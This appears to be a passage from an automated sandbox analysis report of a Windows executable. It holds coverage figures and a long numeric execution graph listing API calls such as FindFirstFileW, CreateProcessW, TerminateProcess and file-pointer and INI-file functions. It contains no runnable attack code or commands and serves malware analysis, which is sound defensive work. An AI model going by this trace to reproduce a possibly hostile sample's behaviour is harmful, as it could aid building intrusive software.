                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: RTL
                                                                                              • API String ID: 3537982541-834975271

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.8%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:1.8%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:58
39 API calls 97807->97808 97809 d7f972 97808->97809 97810 dbfac0 Sleep 97809->97810 97811 d7f97a timeGetTime 97809->97811 97812 d6c92d 39 API calls 97811->97812 97813 d7f990 97812->97813 97813->97410 97815 d6bf07 8 API calls 97814->97815 97816 dd8e4a 97815->97816 97817 d8019b 8 API calls 97816->97817 97818 dd8e54 97817->97818 97819 d641a6 8 API calls 97818->97819 97820 dd8e5e 97819->97820 97821 d68e70 52 API calls 97820->97821 97822 dd8e6d 97821->97822 97823 d6557e 9 API calls 97822->97823 97824 dd8e78 97823->97824 97825 d68e70 52 API calls 97824->97825 97826 dd8e85 97825->97826 97827 d68e70 52 API calls 97826->97827 97828 dd8e97 97827->97828 97829 d68e70 52 API calls 97828->97829 97830 dd8eac GetPrivateProfileStringW 97829->97830 97831 d66ab6 8 API calls 97830->97831 97832 dd8ecf ISource 97831->97832 97832->97410 97834 d68e70 52 API calls 97833->97834 97835 dd6d47 97834->97835 97836 dd6d84 97835->97836 97837 d6c92d 39 API calls 97835->97837 98511 dce783 97836->98511 97839 dd6d76 97837->97839 97839->97836 97841 d6557e 9 API calls 97839->97841 97840 dd6d92 97843 d67a59 8 API calls 97840->97843 97841->97836 97845 dd6dd7 97843->97845 97844 d68e70 52 API calls 97844->97840 97845->97410 97847 dd5ef4 97846->97847 97874 dd5fbd 97846->97874 97848 d6c92d 39 API calls 97847->97848 97850 dd5eff 97848->97850 97849 d68e70 52 API calls 97851 dd5fef 97849->97851 97852 d6c92d 39 API calls 97850->97852 97854 d68e70 52 API calls 97851->97854 97853 dd5f15 97852->97853 97856 d6bf07 8 API calls 97853->97856 97853->97874 97855 dd6001 97854->97855 98516 dcd836 97855->98516 97858 dd5f26 97856->97858 97860 d6bf07 8 API calls 97858->97860 97859 dd6011 97859->97410 97861 dd5f2f 97860->97861 97862 d68e70 52 API calls 97861->97862 97863 dd5f3c 97862->97863 97864 d6694e 8 API calls 97863->97864 97865 dd5f4f 97864->97865 97866 d67af4 8 API calls 97865->97866 97867 dd5f60 97866->97867 97875 dd5f89 97867->97875 98559 dcdc8e 97867->98559 97869 d6c92d 39 API calls 97869->97874 97871 d6b25f 8 API 
calls 97872 dd5f80 97871->97872 97873 dcda81 12 API calls 97872->97873 97873->97875 97874->97849 97874->97859 97875->97869 97877 d6bf07 8 API calls 97876->97877 97878 dd9607 97877->97878 97879 d68e70 52 API calls 97878->97879 97880 dd9616 97879->97880 97881 d6557e 9 API calls 97880->97881 97882 dd9621 97881->97882 97883 d68e70 52 API calls 97882->97883 97884 dd962e 97883->97884 97885 d68e70 52 API calls 97884->97885 97886 dd9640 97885->97886 97887 d68e70 52 API calls 97886->97887 97888 dd9655 WritePrivateProfileStringW 97887->97888 97889 dd966b WritePrivateProfileStringW 97888->97889 97890 dd9677 97888->97890 97889->97890 97890->97410 98629 de88b6 97891->98629 97893 de9efa 97893->97410 97894->97369 97896 d6b26e _wcslen 97895->97896 97897 d8019b 8 API calls 97896->97897 97898 d6b296 __fread_nolock 97897->97898 97899 d8016b 8 API calls 97898->97899 97900 d6b2ac 97899->97900 97900->97382 97901->97373 97902->97397 97903->97401 97904->97372 97905->97408 97906->97408 97907->97408 97908->97404 97909->97408 97910->97546 97911->97545 97912->97548 97913->97544 97915 d68e85 97914->97915 97931 d68e82 97914->97931 97916 d68e8d 97915->97916 97917 d68ebb 97915->97917 97974 d85556 26 API calls 97916->97974 97919 d68ecd 97917->97919 97926 da6b10 97917->97926 97928 da6a29 97917->97928 97975 d7fe8f 51 API calls 97919->97975 97920 d68e9d 97925 d8016b 8 API calls 97920->97925 97923 da6b28 97923->97923 97927 d68ea7 97925->97927 97977 d85513 26 API calls 97926->97977 97929 d6b25f 8 API calls 97927->97929 97930 d8019b 8 API calls 97928->97930 97936 da6aa2 97928->97936 97929->97931 97933 da6a72 97930->97933 97931->97555 97969 d6c92d 97931->97969 97932 d8016b 8 API calls 97934 da6a99 97932->97934 97933->97932 97935 d6b25f 8 API calls 97934->97935 97935->97936 97976 d7fe8f 51 API calls 97936->97976 97978 da22f0 97937->97978 97940 d655c5 97984 d6bceb 97940->97984 97941 d655aa 97942 d684b7 8 API calls 97941->97942 97944 d655b6 97942->97944 97980 d679ed 97944->97980 97947 d8d913 97990 d8d6be 
97947->97990 97951 dce3cf 97950->97951 97952 dce3a5 GetFileAttributesW 97950->97952 97951->97567 97951->97570 97952->97951 97953 dce3b1 FindFirstFileW 97952->97953 97953->97951 97954 dce3c2 FindClose 97953->97954 97954->97951 97956 dda03a FindClose 97955->97956 97960 dd9fc9 97955->97960 97957 dda04b FindFirstFileW 97956->97957 97958 dda0e2 97956->97958 97965 dda060 97957->97965 97967 dda0d9 FindClose 97957->97967 97958->97577 97959 dda028 FindNextFileW 97959->97956 97959->97960 97960->97959 97963 dd9ff7 GetFileAttributesW SetFileAttributesW 97960->97963 97962 dda0c7 FindNextFileW 97962->97965 97962->97967 97963->97960 97964 dda0eb FindClose 97963->97964 97964->97958 97965->97962 97966 dda0a0 SetCurrentDirectoryW 97965->97966 97965->97967 97968 dda0c0 SetCurrentDirectoryW 97965->97968 97966->97965 97967->97958 97968->97962 97970 d6c93e 97969->97970 97971 d6c945 97969->97971 97970->97971 98020 d86661 39 API calls _strftime 97970->98020 97971->97555 97973 d6c988 97973->97555 97974->97920 97975->97920 97976->97926 97977->97923 97979 d6558b GetFullPathNameW 97978->97979 97979->97940 97979->97941 97981 d679fb 97980->97981 97982 d696d9 8 API calls 97981->97982 97983 d655c2 97982->97983 97983->97947 97985 d6bd05 97984->97985 97986 d6bcf8 97984->97986 97987 d8016b 8 API calls 97985->97987 97986->97944 97988 d6bd0f 97987->97988 97989 d8019b 8 API calls 97988->97989 97989->97986 97991 d8d89f 97990->97991 97992 d8d6d5 97990->97992 98018 d8f669 20 API calls __dosmaperr 97991->98018 97992->97991 97996 d8d740 97992->97996 97994 d8d8af 98019 d92b7c 26 API calls ___std_exception_copy 97994->98019 97997 d8d764 97996->97997 98008 d8d78b 97996->98008 98013 d95153 26 API calls 2 library calls 97996->98013 98012 d8f669 20 API calls __dosmaperr 97997->98012 97999 d8d868 97999->97997 98002 d8d87b 97999->98002 98004 d8d774 97999->98004 98000 d8d820 98000->97997 98003 d8d841 98000->98003 98015 d95153 26 API calls 2 library calls 98000->98015 98017 d95153 26 API calls 2 library calls 
98002->98017 98003->97997 98003->98004 98007 d8d857 98003->98007 98004->97562 98016 d95153 26 API calls 2 library calls 98007->98016 98008->97997 98011 d8d7fd 98008->98011 98014 d95153 26 API calls 2 library calls 98008->98014 98011->97999 98011->98000 98012->98004 98013->98008 98014->98011 98015->98003 98016->98004 98017->98004 98018->97994 98019->98004 98020->97973 98022 d6bceb 8 API calls 98021->98022 98023 ded6bf 98022->98023 98024 d6bceb 8 API calls 98023->98024 98025 ded6c7 98024->98025 98026 d6bceb 8 API calls 98025->98026 98027 ded6cf 98026->98027 98028 ded737 98027->98028 98082 d6627c 98027->98082 98030 d6bceb 8 API calls 98028->98030 98034 ded735 98030->98034 98032 d6627c 8 API calls 98033 ded6f7 98032->98033 98033->98028 98036 ded6fc 98033->98036 98069 d68685 98034->98069 98037 d696d9 8 API calls 98036->98037 98042 ded707 98037->98042 98038 ded760 98039 d68685 8 API calls 98038->98039 98040 ded777 98039->98040 98041 d679ed 8 API calls 98040->98041 98043 ded780 98041->98043 98044 d68685 8 API calls 98042->98044 98043->97588 98045 ded728 98044->98045 98046 d696d9 8 API calls 98045->98046 98046->98034 98048 d6c269 8 API calls 98047->98048 98049 ded30e CharUpperBuffW 98048->98049 98050 ded329 98049->98050 98051 d6bf07 8 API calls 98050->98051 98052 ded334 98051->98052 98053 d68685 8 API calls 98052->98053 98054 ded347 _wcslen 98053->98054 98055 d679ed 8 API calls 98054->98055 98056 ded3a4 _wcslen 98054->98056 98055->98056 98056->97590 98070 d68694 98069->98070 98071 d686f1 98069->98071 98070->98071 98073 d6869f 98070->98073 98072 d696d9 8 API calls 98071->98072 98079 d686c2 __fread_nolock 98072->98079 98074 d686ba 98073->98074 98075 da66b7 98073->98075 98085 d68894 8 API calls 98074->98085 98076 d8016b 8 API calls 98075->98076 98078 da66c1 98076->98078 98080 d8019b 8 API calls 98078->98080 98079->98038 98081 da66f4 98080->98081 98083 d6c269 8 API calls 98082->98083 98084 d66287 98083->98084 98084->98028 98084->98032 98085->98079 98121 dd01bf 98089->98121 
98092 dd0308 98137 dd04fe 56 API calls __fread_nolock 98092->98137 98094 dd0320 98095 dd0386 98094->98095 98096 dd0330 98094->98096 98097 dd041c 98095->98097 98098 dd03b6 98095->98098 98114 dd02ae __fread_nolock 98095->98114 98101 dd0368 98096->98101 98138 dd276a 10 API calls 98096->98138 98099 dd04c5 98097->98099 98100 dd0425 98097->98100 98102 dd03bb 98098->98102 98103 dd03e6 98098->98103 98099->98114 98146 d6c5df 39 API calls 98099->98146 98104 dd042a 98100->98104 98105 dd04a2 98100->98105 98128 dd1759 98101->98128 98102->98114 98141 d6c9fb 39 API calls 98102->98141 98103->98114 98142 d6c9fb 39 API calls 98103->98142 98109 dd0469 98104->98109 98110 dd0430 98104->98110 98105->98114 98145 d6c5df 39 API calls 98105->98145 98109->98114 98144 d6c5df 39 API calls 98109->98144 98110->98114 98143 d6c5df 39 API calls 98110->98143 98114->97674 98116 dd033c 98139 dd276a 10 API calls 98116->98139 98119 dd0353 __fread_nolock 98140 dd276a 10 API calls 98119->98140 98122 dd020c 98121->98122 98126 dd01d0 98121->98126 98124 d6c92d 39 API calls 98122->98124 98123 dd020a 98123->98092 98123->98094 98123->98114 98124->98123 98125 d68e70 52 API calls 98125->98126 98126->98123 98126->98125 98127 d84db8 _strftime 40 API calls 98126->98127 98127->98126 98129 dd1764 98128->98129 98130 d8016b 8 API calls 98129->98130 98131 dd176b 98130->98131 98132 dd1798 98131->98132 98133 dd1777 98131->98133 98134 d8019b 8 API calls 98132->98134 98135 d8019b 8 API calls 98133->98135 98136 dd1780 ___scrt_fastfail 98134->98136 98135->98136 98136->98114 98137->98114 98138->98116 98139->98119 98140->98101 98141->98114 98142->98114 98143->98114 98144->98114 98145->98114 98146->98114 98148 dd1852 98147->98148 98162 dd196b 98147->98162 98149 dd1872 98148->98149 98150 dd189f 98148->98150 98153 dd18b6 98148->98153 98149->98150 98155 dd1886 98149->98155 98151 d8019b 8 API calls 98150->98151 98152 dd1894 __fread_nolock 98151->98152 98159 d8016b 8 API calls 98152->98159 98154 d8019b 8 API calls 98153->98154 98165 
dd18d3 98153->98165 98154->98165 98157 d8019b 8 API calls 98155->98157 98156 dd18fa 98158 d8019b 8 API calls 98156->98158 98157->98152 98160 dd1900 98158->98160 98159->98162 98166 d7c1f1 98160->98166 98162->97684 98165->98152 98165->98155 98165->98156 98167 d8019b 8 API calls 98166->98167 98168 d7c208 98167->98168 98169 d8016b 8 API calls 98168->98169 98170 d7c214 98169->98170 98171 d7f9e2 10 API calls 98170->98171 98171->98152 98173 d679ed 8 API calls 98172->98173 98174 dcdab6 GetFileAttributesW 98173->98174 98175 dcdaca GetLastError 98174->98175 98178 dcdae3 98174->98178 98176 dcdad7 CreateDirectoryW 98175->98176 98177 dcdae5 98175->98177 98176->98177 98176->98178 98177->98178 98179 d696d9 8 API calls 98177->98179 98178->97698 98180 dcdb27 98179->98180 98181 dcda81 8 API calls 98180->98181 98182 dcdb30 98181->98182 98182->98178 98183 dcdb34 CreateDirectoryW 98182->98183 98183->98178 98185 d6bf07 8 API calls 98184->98185 98186 dcdb88 98185->98186 98187 d6bf07 8 API calls 98186->98187 98188 dcdb91 98187->98188 98189 d6bf07 8 API calls 98188->98189 98190 dcdb9a 98189->98190 98191 d6557e 9 API calls 98190->98191 98192 dcdba5 98191->98192 98193 dce9c5 GetFileAttributesW 98192->98193 98194 dcdbae 98193->98194 98195 dcdbc0 98194->98195 98197 d665a4 8 API calls 98194->98197 98209 d6694e 98195->98209 98197->98195 98198 dcdbd4 FindFirstFileW 98199 dcdc60 FindClose 98198->98199 98205 dcdbf3 98198->98205 98200 dcdc6b 98199->98200 98200->97703 98201 dcdc3b FindNextFileW 98203 dcdc4f 98201->98203 98201->98205 98202 d6be6d 8 API calls 98202->98205 98203->98205 98205->98199 98205->98201 98205->98202 98251 d67af4 98205->98251 98260 d665a4 98205->98260 98210 d6bf07 8 API calls 98209->98210 98211 d66964 98210->98211 98212 d6bf07 8 API calls 98211->98212 98213 d6696c 98212->98213 98214 d6bf07 8 API calls 98213->98214 98215 d66974 98214->98215 98216 d6bf07 8 API calls 98215->98216 98217 d6697c 98216->98217 98218 d669b0 98217->98218 98219 da5725 98217->98219 98221 d68685 8 API calls 
98218->98221 98220 d6be6d 8 API calls 98219->98220 98222 da572e 98220->98222 98223 d669be 98221->98223 98224 d6bceb 8 API calls 98222->98224 98225 d696d9 8 API calls 98223->98225 98227 d669f3 98224->98227 98226 d669c8 98225->98226 98226->98227 98228 d68685 8 API calls 98226->98228 98229 d66a38 98227->98229 98230 d66a14 98227->98230 98246 da5750 98227->98246 98232 d669e9 98228->98232 98231 d68685 8 API calls 98229->98231 98230->98229 98235 d6627c 8 API calls 98230->98235 98233 d66a49 98231->98233 98234 d696d9 8 API calls 98232->98234 98236 d66a5f 98233->98236 98241 d6be6d 8 API calls 98233->98241 98234->98227 98238 d66a21 98235->98238 98237 d66a73 98236->98237 98242 d6be6d 8 API calls 98236->98242 98240 d66a7e 98237->98240 98244 d6be6d 8 API calls 98237->98244 98238->98229 98243 d68685 8 API calls 98238->98243 98239 d684b7 8 API calls 98248 da5810 98239->98248 98245 d6be6d 8 API calls 98240->98245 98250 d66a89 98240->98250 98241->98236 98242->98237 98243->98229 98244->98240 98245->98250 98246->98239 98247 d6627c 8 API calls 98247->98248 98248->98229 98248->98247 98269 d6acc0 8 API calls __fread_nolock 98248->98269 98250->98198 98252 d67b06 98251->98252 98253 da63b3 98251->98253 98270 d67b17 98252->98270 98280 d6662b 8 API calls __fread_nolock 98253->98280 98256 da63bd 98261 da5629 98260->98261 98262 d665bb 98260->98262 98264 d8016b 8 API calls 98261->98264 98286 d665cc 98262->98286 98266 da5633 _wcslen 98264->98266 98269->98248 98280->98256 98297 dd17cb 98296->98297 98298 d8016b 8 API calls 98297->98298 98299 dd17d2 98298->98299 98302 dcfbca 98299->98302 98301 dd180c 98301->97713 98303 d6c269 8 API calls 98302->98303 98304 dcfbdd CharLowerBuffW 98303->98304 98305 dcfbf0 98304->98305 98306 dcfc2e 98305->98306 98307 d6627c 8 API calls 98305->98307 98319 dcfbfa ___scrt_fastfail 98305->98319 98308 dcfc40 98306->98308 98310 d6627c 8 API calls 98306->98310 98307->98305 98309 d8019b 8 API calls 98308->98309 98313 dcfc6e 98309->98313 98310->98308 98315 dcfc90 98313->98315 
98335 dcfb02 8 API calls 98313->98335 98314 dcfccd 98316 d8016b 8 API calls 98314->98316 98314->98319 98320 dcfd21 98315->98320 98317 dcfce7 98316->98317 98318 d8019b 8 API calls 98317->98318 98318->98319 98319->98301 98321 d6bf07 8 API calls 98320->98321 98322 dcfd53 98321->98322 98323 d6bf07 8 API calls 98322->98323 98324 dcfd5c 98323->98324 98325 d6bf07 8 API calls 98324->98325 98333 dcfd65 98325->98333 98326 d684b7 8 API calls 98326->98333 98327 dd0029 98327->98314 98328 d6acc0 8 API calls 98328->98333 98329 d86718 GetStringTypeW 98329->98333 98331 d86661 39 API calls 98331->98333 98332 dcfd21 40 API calls 98332->98333 98333->98326 98333->98327 98333->98328 98333->98329 98333->98331 98333->98332 98334 d6be6d 8 API calls 98333->98334 98336 d86742 GetStringTypeW _strftime 98333->98336 98334->98333 98335->98313 98336->98333 98338 d8019b 8 API calls 98337->98338 98339 d67a39 98338->98339 98340 d8016b 8 API calls 98339->98340 98341 d67a47 98340->98341 98341->97721 98343 d6bf07 8 API calls 98342->98343 98344 dc9b6d 98343->98344 98345 d67a14 8 API calls 98344->98345 98346 dc9b81 98345->98346 98347 dc96e3 41 API calls 98346->98347 98352 dc9ba3 98346->98352 98348 dc9b9d 98347->98348 98350 d68685 8 API calls 98348->98350 98348->98352 98350->98352 98351 d68685 8 API calls 98351->98352 98352->98351 98353 dc9c42 98352->98353 98354 d67af4 8 API calls 98352->98354 98356 dc9c26 98352->98356 98381 dc96e3 98352->98381 98355 d6be6d 8 API calls 98353->98355 98357 dc9c51 98353->98357 98354->98352 98355->98357 98358 d68685 8 API calls 98356->98358 98357->97748 98359 dc9c36 98358->98359 98360 d67af4 8 API calls 98359->98360 98360->98353 98362 d66ac6 98361->98362 98363 da587b 98361->98363 98368 d8016b 8 API calls 98362->98368 98364 da588c 98363->98364 98365 d684b7 8 API calls 98363->98365 98366 d6bceb 8 API calls 98364->98366 98365->98364 98367 da5896 98366->98367 98367->98367 98369 d66ad9 98368->98369 98370 d66af4 98369->98370 98371 d66ae2 98369->98371 98373 d6bf07 8 API calls 
98370->98373 98372 d6b25f 8 API calls 98371->98372 98374 d66aea 98372->98374 98373->98374 98374->97749 98376 d67a9e 98375->98376 98377 d67a65 98375->98377 98378 d67a78 98376->98378 98379 d6be6d 8 API calls 98376->98379 98380 d8016b 8 API calls 98377->98380 98378->97749 98379->98378 98380->98378 98382 dc9703 _wcslen 98381->98382 98383 dc97f2 98382->98383 98385 dc97f7 98382->98385 98386 dc9738 98382->98386 98383->98352 98385->98383 98387 d7e2e5 41 API calls 98385->98387 98386->98383 98388 d7e2e5 98386->98388 98387->98385 98389 d7e2f4 CompareStringW 98388->98389 98390 dbe463 98388->98390 98392 d7e319 98389->98392 98390->98392 98393 d8e24b 40 API calls 98390->98393 98392->98386 98393->98390 98395 da5985 98394->98395 98396 d66e69 CreateFileW 98394->98396 98397 d66e88 98395->98397 98398 da598b CreateFileW 98395->98398 98396->98397 98397->97784 98397->97785 98398->98397 98399 da59b3 98398->98399 98444 d66bfa 98399->98444 98403 d66b27 98402->98403 98414 d66b24 ISource 98402->98414 98404 d66bfa 3 API calls 98403->98404 98403->98414 98405 d66b44 98404->98405 98406 da589b 98405->98406 98407 d66b51 98405->98407 98409 d7fdc9 3 API calls 98406->98409 98408 d8019b 8 API calls 98407->98408 98410 d66b5d 98408->98410 98409->98414 98450 d641a6 98410->98450 98414->97795 98416 d66bfa 3 API calls 98416->98414 98418 d66bfa 3 API calls 98417->98418 98419 d7fde7 98418->98419 98420 d66bfa 3 API calls 98419->98420 98421 d7fe08 98420->98421 98421->97774 98423 d7bfc7 98422->98423 98424 d7c003 98422->98424 98423->98424 98426 d7bfd6 98423->98426 98425 d6bceb 8 API calls 98424->98425 98434 dcd2ab 98425->98434 98428 d7bfeb 98426->98428 98431 d7bff8 98426->98431 98427 dcd2da 98427->97790 98460 d7c009 98428->98460 98467 dcd3b2 12 API calls 98431->98467 98432 d7bff4 98432->97790 98434->98427 98468 dcd249 98434->98468 98475 d6acc0 8 API calls __fread_nolock 98434->98475 98436->97800 98437->97799 98438->97805 98439->97756 98440->97756 98442 d6b050 2 API calls 98441->98442 98443 d641da 98442->98443 
98443->97787 98445 d66c11 98444->98445 98446 da58ec SetFilePointerEx 98445->98446 98447 d66c98 SetFilePointerEx SetFilePointerEx 98445->98447 98448 da58db 98445->98448 98449 d66c64 98445->98449 98447->98449 98448->98446 98449->98397 98451 d8016b 8 API calls 98450->98451 98452 d641b8 98451->98452 98453 d6b050 98452->98453 98454 d6b0cb 98453->98454 98455 d6b05e 98453->98455 98459 d7f13c SetFilePointerEx 98454->98459 98456 d66b73 98455->98456 98458 d6b09c ReadFile 98455->98458 98456->98416 98458->98455 98458->98456 98459->98455 98461 d7c1f1 8 API calls 98460->98461 98462 d7c021 98461->98462 98476 d6adc1 98462->98476 98466 d7c03c 98466->98432 98467->98432 98469 dcd26a 98468->98469 98470 dcd253 98468->98470 98471 d6b050 2 API calls 98469->98471 98470->98469 98472 dcd259 98470->98472 98474 dcd263 98471->98474 98473 d6b050 2 API calls 98472->98473 98473->98474 98474->98434 98475->98434 98490 d7feaa 98476->98490 98478 d6ae07 98478->98466 98482 d68774 MultiByteToWideChar 98478->98482 98479 d6b050 2 API calls 98480 d6add2 98479->98480 98480->98478 98480->98479 98497 d6b0e3 8 API calls __fread_nolock 98480->98497 98483 d687e7 98482->98483 98484 d687a0 98482->98484 98486 d6bceb 8 API calls 98483->98486 98485 d8019b 8 API calls 98484->98485 98487 d687b5 MultiByteToWideChar 98485->98487 98489 d687db 98486->98489 98498 d687f0 98487->98498 98489->98466 98491 dbfe13 98490->98491 98492 d7febb 98490->98492 98493 d8016b 8 API calls 98491->98493 98492->98480 98494 dbfe1d 98493->98494 98495 d8019b 8 API calls 98494->98495 98496 dbfe32 98495->98496 98497->98480 98499 d68884 98498->98499 98500 d68803 98498->98500 98501 d696d9 8 API calls 98499->98501 98500->98499 98503 d6880f 98500->98503 98502 d68821 __fread_nolock 98501->98502 98502->98489 98504 d68847 98503->98504 98505 d68819 98503->98505 98506 d8016b 8 API calls 98504->98506 98510 d68894 8 API calls 98505->98510 98508 d68851 98506->98508 98509 d8019b 8 API calls 98508->98509 98509->98502 98510->98502 98512 da22f0 __wsopen_s 
98511->98512 98513 dce790 GetShortPathNameW 98512->98513 98514 d684b7 8 API calls 98513->98514 98515 dce7b8 98514->98515 98515->97840 98515->97844 98517 d6bf07 8 API calls 98516->98517 98518 dcd853 98517->98518 98519 d6bf07 8 API calls 98518->98519 98520 dcd85b 98519->98520 98521 d6bf07 8 API calls 98520->98521 98522 dcd863 98521->98522 98523 d6557e 9 API calls 98522->98523 98524 dcd86d 98523->98524 98525 d6557e 9 API calls 98524->98525 98526 dcd877 98525->98526 98562 dce958 98526->98562 98528 dcd882 98529 dce9c5 GetFileAttributesW 98528->98529 98530 dcd88d 98529->98530 98531 dcd89f 98530->98531 98532 d665a4 8 API calls 98530->98532 98533 dce9c5 GetFileAttributesW 98531->98533 98532->98531 98534 dcd8a7 98533->98534 98535 dcd8b4 98534->98535 98536 d665a4 8 API calls 98534->98536 98537 d6bf07 8 API calls 98535->98537 98536->98535 98538 dcd8bc 98537->98538 98539 d6bf07 8 API calls 98538->98539 98540 dcd8c4 98539->98540 98541 d6694e 8 API calls 98540->98541 98542 dcd8d5 FindFirstFileW 98541->98542 98560 dce387 4 API calls 98559->98560 98561 dcdc95 98560->98561 98561->97871 98561->97875 98563 d6bf07 8 API calls 98562->98563 98564 dce96d 98563->98564 98565 d6bf07 8 API calls 98564->98565 98566 dce975 98565->98566 98567 d6694e 8 API calls 98566->98567 98568 dce984 98567->98568 98569 d6694e 8 API calls 98568->98569 98570 dce994 98569->98570 98571 d7e2e5 41 API calls 98570->98571 98572 dce9a9 98571->98572 98572->98528 98630 d68e70 52 API calls 98629->98630 98631 de88ed 98630->98631 98655 de8932 ISource 98631->98655 98667 de9632 98631->98667 98633 de8bde 98634 de8dac 98633->98634 98638 de8bec 98633->98638 98734 de9843 59 API calls 98634->98734 98637 de8dbb 98637->98638 98639 de8dc7 98637->98639 98680 de87e3 98638->98680 98639->98655 98640 d68e70 52 API calls 98658 de89a6 98640->98658 98645 de8c25 98694 d80000 98645->98694 98648 de8c5f 98698 d67d51 98648->98698 98649 de8c45 98733 dd3ef6 81 API calls __wsopen_s 98649->98733 98652 de8c50 GetCurrentProcess TerminateProcess 
98652->98648 98655->97893 98657 d71c50 8 API calls 98660 de8c9e 98657->98660 98658->98633 98658->98640 98658->98655 98731 dc4a0c 8 API calls __fread_nolock 98658->98731 98732 de8e7c 41 API calls _strftime 98658->98732 98659 de8e22 98659->98655 98662 de8e36 FreeLibrary 98659->98662 98663 de94da 74 API calls 98660->98663 98662->98655 98666 de8caf 98663->98666 98665 d6b3fe 8 API calls 98665->98666 98666->98659 98666->98665 98709 d71c50 98666->98709 98720 de94da 98666->98720 98668 d6c269 8 API calls 98667->98668 98669 de964d CharLowerBuffW 98668->98669 98670 dc96e3 41 API calls 98669->98670 98671 de966e 98670->98671 98673 d6bf07 8 API calls 98671->98673 98679 de96a7 _wcslen 98671->98679 98674 de9689 98673->98674 98675 d68685 8 API calls 98674->98675 98676 de969d 98675->98676 98677 d696d9 8 API calls 98676->98677 98677->98679 98678 de97bd _wcslen 98678->98658 98679->98678 98735 de8e7c 41 API calls _strftime 98679->98735 98681 de87fe 98680->98681 98682 de8849 98680->98682 98683 d8019b 8 API calls 98681->98683 98686 de99f5 98682->98686 98684 de8820 98683->98684 98684->98682 98685 d8016b 8 API calls 98684->98685 98685->98684 98687 de9c0a ISource 98686->98687 98692 de9a19 _strcat _wcslen ___std_exception_copy 98686->98692 98687->98645 98688 d6c92d 39 API calls 98688->98692 98689 d6c5df 39 API calls 98689->98692 98690 d6c9fb 39 API calls 98690->98692 98691 d68e70 52 API calls 98691->98692 98692->98687 98692->98688 98692->98689 98692->98690 98692->98691 98736 dcf7da 10 API calls _wcslen 98692->98736 98696 d80015 98694->98696 98695 d800ad CreateProcessW 98697 d8007b 98695->98697 98696->98695 98696->98697 98697->98648 98697->98649 98699 d67d59 98698->98699 98700 d8016b 8 API calls 98699->98700 98701 d67d67 98700->98701 98737 d68386 98701->98737 98704 d683b0 98705 d6c700 8 API calls 98704->98705 98706 d683c0 98705->98706 98707 d8019b 8 API calls 98706->98707 98708 d6845c 98706->98708 98707->98708 98708->98657 98708->98666 98710 d71c62 98709->98710 98713 d71c6b 98710->98713 98740 
d7b71c 8 API calls 98710->98740 98712 d71d20 98712->98666 98713->98712 98714 d8016b 8 API calls 98713->98714 98715 d71d89 98714->98715 98716 d8016b 8 API calls 98715->98716 98721 de94f2 98720->98721 98730 de950e 98720->98730 98722 de951a 98721->98722 98723 de94f9 98721->98723 98724 de95c3 98721->98724 98721->98730 98727 d66ab6 8 API calls 98722->98727 98741 dcf3fd 10 API calls _strlen 98723->98741 98742 dd15b3 72 API calls ISource 98724->98742 98727->98730 98728 de9503 98729 d66ab6 8 API calls 98728->98729 98729->98730 98730->98666 98731->98658 98732->98658 98733->98652 98734->98637 98735->98678 98736->98692 98738 d8016b 8 API calls 98737->98738 98739 d67d6f 98738->98739 98739->98704 98740->98713 98741->98728 98742->98730 98744 dce72e 98743->98744 98745 dce745 98744->98745 98748 dce74b 98744->98748 98749 d86742 GetStringTypeW _strftime 98744->98749 98750 d8668b 39 API calls _strftime 98745->98750 98748->97454 98749->98744 98750->98748 98751 d6367c 98754 d63696 98751->98754 98755 d636ad 98754->98755 98756 d636b2 98755->98756 98757 d63711 98755->98757 98793 d6370f 98755->98793 98761 d636bf 98756->98761 98762 d6378b PostQuitMessage 98756->98762 98759 d63717 98757->98759 98760 da3dce 98757->98760 98758 d636f6 DefWindowProcW 98796 d63690 98758->98796 98763 d63743 SetTimer RegisterWindowMessageW 98759->98763 98764 d6371e 98759->98764 98810 d62f24 10 API calls 98760->98810 98765 da3e3b 98761->98765 98766 d636ca 98761->98766 98762->98796 98770 d6376c CreatePopupMenu 98763->98770 98763->98796 98768 d63727 KillTimer 98764->98768 98769 da3d6f 98764->98769 98815 dcc80c 65 API calls ___scrt_fastfail 98765->98815 98771 d636d4 98766->98771 98772 d63795 98766->98772 98806 d6388e Shell_NotifyIconW ___scrt_fastfail 98768->98806 98776 da3daa MoveWindow 98769->98776 98777 da3d74 98769->98777 98770->98796 98779 d636df 98771->98779 98780 da3e20 98771->98780 98799 d7fcbb 98772->98799 98774 da3def 98811 d7f1c6 40 API calls 98774->98811 98776->98796 98783 da3d7a 98777->98783 98784 da3d99 

Control-flow Graph

• Executed
• Not Executed
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00D65DA7
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                              • GetCurrentProcess.KERNEL32(?,00DFDC2C,00000000,?,?), ref: 00D65ED3
                                                                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00D65EDA
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D65F05
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D65F17
                                                                                              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D65F25
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D65F2C
                                                                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 00D65F51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
